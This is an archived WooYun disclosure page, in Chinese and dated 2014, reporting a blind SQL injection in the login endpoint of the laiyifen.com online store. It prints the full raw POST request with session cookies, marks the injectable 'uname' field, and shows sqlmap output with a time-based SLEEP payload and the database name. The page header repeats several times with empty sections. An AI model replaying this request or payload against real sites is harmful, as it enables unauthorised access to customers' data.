来伊份官方商城某处SQL盲注可致80W+用户数据泄露（第二弹）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-083889

漏洞标题：来伊份官方商城某处SQL盲注可致80W+用户数据泄露（第二弹）

漏洞作者： pandada

提交时间：2014-11-19 20:02

修复时间：2015-01-03 20:04

公开时间：2015-01-03 20:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-11-19：细节已通知厂商并且等待厂商处理中
2014-11-21：厂商已经确认，细节仅向厂商公开
2014-12-01：细节向核心白帽子及相关领域专家公开
2014-12-11：细节向普通白帽子公开
2014-12-21：细节向实习白帽子公开
2015-01-03：细节向公众公开

简要描述：

好人做到底，我给你又找到一处盲注。这回能不给我高点分，让我从此不再是路人！

详细说明：

注入点说明：uname是注入点，如图中星号所示

POST /index.php/openapi/pam_callback/login/module/pam_passport_basic/type/member/appid/b2c/redirect/L2luZGV4LnBocC9wYXNzcG9ydC1wb3N0X2xvZ2luLUwybHVaR1Y0TG5Cb2NDOXRaVzFpWlhJdWFIUnRiQT09Lmh0bWw%3D HTTP/1.1
Content-Length: 175
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.laiyifen.com:80/
Cookie: vary=b0ce119e2261931586e0e8bebe87b1121a94ee60638487365167a950e7783a9a; laiyifen_cookie=553648906.20480.0000; s=4833654e485fd985efdc4b368115d1f4; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00; cart[go_back_link]=http%3A%2F%2Fwww.laiyifen.com%2F; ZDEDebuggerPresent=php,phtml,php3; MEMBER=-d41d8cd98f00b204e9800998ecf8427e-d41d8cd98f00b204e9800998ecf8427e-1416322579
Host: www.laiyifen.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
forward=&password=g00dPa%24%24w0rD&uname=*

漏洞证明：

sqlmap identified the following injection points with a total of 778 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: forward=&password=g00dPa$$w0rD&uname=" AND SLEEP(5) AND "IQDW"="IQDW
---
current user:    '[email protected].%.%'
current database:    'laiyifendb'

其他的我就不证明了，参照之前提交的。盲注是慢点，内容肯定是一样的罗。

修复方案：

为了用户数据安全，商家赶紧排查修复。

版权声明：转载请注明来源 pandada@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：18

确认时间：2014-11-21 10:35

厂商回复：

非常感谢pandada兄和乌云的支持，非常感谢！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-083889

漏洞标题：来伊份官方商城某处SQL盲注可致80W+用户数据泄露（第二弹）

相关厂商：laiyifen.com

漏洞作者： pandada

提交时间：2014-11-19 20:02

修复时间：2015-01-03 20:04

公开时间：2015-01-03 20:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 pandada@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-083889

漏洞标题：来伊份官方商城某处SQL盲注可致80W+用户数据泄露（第二弹）

相关厂商：laiyifen.com

漏洞作者： pandada

提交时间：2014-11-19 20:02

修复时间：2015-01-03 20:04

公开时间：2015-01-03 20:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-083889"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 pandada@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：